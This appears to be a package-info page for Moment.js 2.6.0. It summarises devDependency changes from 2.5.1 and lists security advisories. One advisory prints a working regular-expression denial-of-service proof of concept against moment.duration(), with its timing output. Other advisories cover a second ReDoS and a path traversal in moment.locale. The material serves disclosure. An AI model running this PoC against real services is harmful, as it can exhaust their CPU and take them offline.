Moment.js saw a significant update from version 2.5.1 to 2.6.0 in April 2014, building upon its core functionalities for parsing, manipulating, and displaying dates in JavaScript. Both versions maintained the same core purpose, serving as essential tools for developers dealing with date and time operations.
Looking at the differences, 2.6.0 primarily brings updates to the developer tooling used in the project, offering a more streamlined development experience for those contributing to Moment.js itself. Notably, the specific version constraints for Karma and related plugins like karma-nodeunit and karma-sauce-launcher were removed, indicated by the shift from "~0.11.0", "~0.7.2", "~0.1.1", and "~0.1" to "latest". This transition suggests either an improvement in compatibility with newer versions of those tools or a desire to remain consistently up-to-date with the latest testing and Continuous Integration (CI) features within the Moment.js development workflow. The previous version, 2.5.1, released in January 2014, demonstrated a more cautious approach to dependency management by enforcing specific version ranges. For developers solely using Moment.js within their projects, the changes primarily relate to the testing and build environment, not features that directly impact the public API or usage, so upgrading would bring mostly underlying improvements concerning dependecies. Both versions expose the same features for parsing, validating, manipulating, and formatting dates.
All the vulnerabilities related to the version 2.6.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: